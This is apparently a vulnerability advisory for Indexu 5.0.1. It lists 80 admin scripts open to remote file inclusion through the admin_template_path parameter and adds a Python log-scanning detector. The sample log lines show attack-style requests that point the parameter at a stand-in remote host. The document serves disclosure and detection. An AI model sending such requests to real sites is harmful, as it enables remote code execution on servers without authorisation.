Multiple PHP remote file inclusion vulnerabilities exist in Indexu 5.0.1. A remote attacker can execute arbitrary PHP code via a URL in the admin_template_path parameter to the following admin/ scripts: (1) app_change_email.php, (2) app_change_pwd.php, (3) app_mod_rewrite.php, (4) app_page_caching.php, (5) app_setup.php, (6) cat_add.php, (7) cat_delete.php, (8) cat_edit.php, (9) cat_path_update.php, (10) cat_search.php, (11) cat_struc.php, (12) cat_view.php, (13) cat_view_hidden.php, (14) cat_view_hierarchy.php, (15) cat_view_registered_only.php, (16) checkurl_web.php, (17) db_alter.php, (18) db_alter_change.php, (19) db_backup.php, (20) db_export.php, (21) db_import.php, (22) editor_add.php, (23) editor_delete.php, (24) editor_validate.php, (25) head.php, (26) index.php, (27) inv_config.php, (28) inv_config_payment.php, (29) inv_create.php, (30) inv_delete.php, (31) inv_edit.php, (32) inv_markpaid.php, (33) inv_markunpaid.php, (34) inv_overdue.php, (35) inv_paid.php, (36) inv_send.php, (37) inv_unpaid.php, (38) lang_modify.php, (39) link_add.php, (40) link_bad.php, (41) link_bad_delete.php, (42) link_checkurl.php, (43) link_delete.php, (44) link_duplicate.php, (45) link_edit.php, (46) link_premium_listing.php, (47) link_premium_sponsored.php, (48) link_search.php, (49) link_sponsored_listing.php, (50) link_validate.php, (51) link_validate_edit.php, (52) link_view.php, (53) log_search.php, (54) mail_modify.php, (55) menu.php, (56) message_create.php, (57) message_delete.php, (58) message_edit.php, (59) message_send.php, (60) message_subscriber.php, (61) message_view.php, (62) review_validate.php, (63) review_validate_edit.php, (64) summary.php, (65) template_active.php, (66) template_add_custom.php, (67) template_delete.php, (68) template_delete_file.php, (69) template_duplicate.php, (70) template_export.php, (71) template_import.php, (72) template_manager.php, (73) template_modify.php, (74) template_modify_file.php, (75) template_rename.php, (76) user_add.php, (77) user_delete.php, (78) user_edit.php, (79) user_search.php, and (80) whos.php.
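A detection check for the pattern described above, added here as an example and not taken from the advisory or from Indexu: it scans web-server access logs for requests to `admin/` scripts whose `admin_template_path` value points at a remote resource. It assumes Common/Combined Log Format, matches any `.php` file under `admin/` rather than only the 80 listed scripts, and the function name, regexes and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "admin_template_path"  # parameter named in the advisory
# Request field of a Common/Combined Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value starts with scheme://, data:, a protocol-relative // or a UNC \\ prefix.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:|//|\\\\)", re.I)


def suspicious_requests(log_lines):
    """Return (script, value) pairs for admin/*.php requests whose
    admin_template_path query value points at a remote resource."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("target"))
        path = unquote(parts.path).lower()
        if "/admin/" not in path or not path.endswith(".php"):
            continue
        # parse_qsl percent-decodes names and values once, as PHP does.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == PARAM and REMOTE_RE.match(value):
                hits.append((path.rsplit("/", 1)[-1], value))
    return hits


# Constructed sample lines (documentation IP ranges, example.invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /indexu/admin/cat_add.php'
    '?admin_template_path=http://example.invalid/t.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /indexu/admin/whos.php'
    '?admin_template_path=ftp%3A%2F%2Fexample.invalid%2Ft HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /indexu/admin/index.php'
    '?admin_template_path=templates/ HTTP/1.1" 200 900',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /indexu/search.php'
    '?q=http://example.invalid/ HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for script, value in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT admin/{script}: {PARAM}={value}")
```

The check only sees query strings, so a value delivered outside the URL does not appear in a standard access log and needs a WAF or application-level rule instead.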